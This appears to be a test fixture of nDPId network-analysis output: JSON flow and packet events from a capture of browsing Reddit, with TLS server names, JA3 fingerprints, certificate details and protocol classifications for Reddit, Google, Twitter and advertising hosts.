-00982{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9406,"source":"reddit.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291690926,"flow_last_seen":1605291690999,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291690999,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46814,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"cdn.ampproject.org","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01005{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9417,"source":"reddit.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291690926,"flow_last_seen":1605291690999,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291690999,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:811::200a","src_port":38166,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"fonts.googleapis.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01012{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9427,"source":"reddit.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291690926,"flow_last_seen":1605291691002,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291691002,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80f::2001","src_port":36964,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.3","client_requested_server_name":"tpc.googlesyndication.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01012{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9434,"source":"reddit.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291690926,"flow_last_seen":1605291691003,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291691003,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80f::2001","src_port":36966,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.3","client_requested_server_name":"tpc.googlesyndication.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01012{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9436,"source":"reddit.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291690926,"flow_last_seen":1605291691003,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291691003,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80f::2001","src_port":36970,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.3","client_requested_server_name":"tpc.googlesyndication.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01012{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9446,"source":"reddit.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291690926,"flow_last_seen":1605291691004,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291691004,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80f::2001","src_port":36968,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.3","client_requested_server_name":"tpc.googlesyndication.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9475,"source":"reddit.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":2,"flow_last_seen":1605291691029,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291691029,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgPAAAAAAAAIAEqAcsBIEmLB5kd7IUo3\/YpAbuQbO1037mLrsxooBJXgErvAAACBAV4AQMDAwQCCArC10wIuJU7dg=="} -00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9476,"source":"reddit.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":3,"flow_last_seen":1605291691029,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":74,"pkt_l4_len":20,"thread_ts_msec":1605291691029,"pkt":"qtsDr8lk5EKm5WPyht1gBfK\/ABQGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIDwAAAAAAACABkGwBu4uuzGgAAAAAUAQAANo6AAA="} -00611{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":11226,"source":"reddit.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291696948,"flow_last_seen":1605291696948,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291696948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::34d3:acec","src_port":47006,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11226,"source":"reddit.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":1,"flow_last_seen":1605291696948,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291696948,"pkt":"qtsDr8lk5EKm5WPyht1gDNdJACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAAA006zst54Bu3jHKBQAAAAAoAL9IL45AAACBAWgBAIIClIhuaMAAAAAAQMDBw=="} -00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11227,"source":"reddit.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":2,"flow_last_seen":1605291696965,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291696965,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAADTTrOwqAcsBIEmLB5kd7IUo3\/YpAbu3nh9OKxV4xygVoBJXgPOCAAACBAV4AQMDAwQCCArC12M3UiG5ow=="} -00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11228,"source":"reddit.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":3,"flow_last_seen":1605291696965,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291696965,"pkt":"qtsDr8lk5EKm5WPyht1gDNdJACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAAA006zst54Bu3jHKBUfTisWgBAB+3eDAAABAQgKUiG5tMLXYzc="} -00937{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11229,"source":"reddit.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291696948,"flow_last_seen":1605291696965,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291696965,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::34d3:acec","src_port":47006,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"d9.flashtalking.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00993{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":11233,"source":"reddit.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291696948,"flow_last_seen":1605291697033,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1605291697033,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::34d3:acec","src_port":47006,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"d9.flashtalking.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01407{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":11239,"source":"reddit.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1605291696948,"flow_last_seen":1605291697034,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":6001,"flow_avg_l4_payload_len":500,"midstream":0,"thread_ts_msec":1605291697034,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::34d3:acec","src_port":47006,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"d9.flashtalking.com","server_names":"tag.device9.com,www.tag.device9.com,fp.zenaps.com,the.sciencebehindecommerce.com,d9.flashtalking.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=Arizona, L=Scottsdale, O=GoDaddy.com, Inc., OU=http:\/\/certs.godaddy.com\/repository\/, CN=Go Daddy Secure Certificate Authority - G2","subjectDN":"OU=Domain Control Validated, CN=tag.device9.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"8B:5C:A4:62:70:92:3A:09:C3:72:49:B2:A2:22:32:16:22:87:9D:F3"}} -00727{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":39,"flow_first_seen":1605291688749,"flow_last_seen":1605291688963,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":10966,"flow_avg_l4_payload_len":281,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2004","src_port":57282,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} -00726{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":33,"flow_first_seen":1605291690384,"flow_last_seen":1605291690520,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":6642,"flow_avg_l4_payload_len":201,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::2002","src_port":59336,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} -00727{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":782,"flow_first_seen":1605291687514,"flow_last_seen":1605291688963,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":6288,"flow_tot_l4_payload_len":596288,"flow_avg_l4_payload_len":762,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:789d","src_port":48240,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Twitter","breed":"Fun","category":"SocialNetwork"}} -00737{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"finished","flow_packets_processed":85,"flow_first_seen":1605291690926,"flow_last_seen":1605291691284,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2470,"flow_tot_l4_payload_len":37085,"flow_avg_l4_payload_len":436,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80f::2001","src_port":36964,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"}} -00735{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1605291690926,"flow_last_seen":1605291691053,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":3817,"flow_avg_l4_payload_len":190,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80f::2001","src_port":36966,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"}} -00735{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1605291690926,"flow_last_seen":1605291691064,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":3815,"flow_avg_l4_payload_len":200,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80f::2001","src_port":36968,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"}} -00735{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1605291690926,"flow_last_seen":1605291691062,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":3816,"flow_avg_l4_payload_len":190,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80f::2001","src_port":36970,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"}} -00674{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1605291690992,"flow_last_seen":1605291691029,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80f::2001","src_port":36972,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00617{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1605291690992,"flow_last_seen":1605291691029,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80f::2001","src_port":36972,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00717{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1605291687934,"flow_last_seen":1605291688340,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":6623,"flow_avg_l4_payload_len":245,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::1736:86f1","src_port":44264,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Advertisement"}} -00725{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":847,"flow_first_seen":1605291684452,"flow_last_seen":1605291698703,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":6245,"flow_tot_l4_payload_len":482020,"flow_avg_l4_payload_len":569,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56558,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}} -00728{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":114,"flow_first_seen":1605291688843,"flow_last_seen":1605291691232,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2416,"flow_tot_l4_payload_len":69230,"flow_avg_l4_payload_len":607,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80c::2003","src_port":47302,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} -00722{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1605291684481,"flow_last_seen":1605291684654,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":4527,"flow_avg_l4_payload_len":266,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56560,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}} -00725{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1605291688843,"flow_last_seen":1605291689005,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":3846,"flow_avg_l4_payload_len":202,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80c::2003","src_port":47304,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} -00721{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1605291686035,"flow_last_seen":1605291686148,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":4181,"flow_avg_l4_payload_len":278,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56562,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}} -00729{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":1442,"flow_first_seen":1605291686035,"flow_last_seen":1605291696381,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":11528,"flow_tot_l4_payload_len":1922359,"flow_avg_l4_payload_len":1333,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56564,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}} -00721{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1605291686035,"flow_last_seen":1605291686148,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":4181,"flow_avg_l4_payload_len":245,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56566,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}} -00721{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1605291686035,"flow_last_seen":1605291686148,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":4181,"flow_avg_l4_payload_len":232,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56568,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}} -00721{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1605291686035,"flow_last_seen":1605291686149,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":4181,"flow_avg_l4_payload_len":245,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56570,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}} 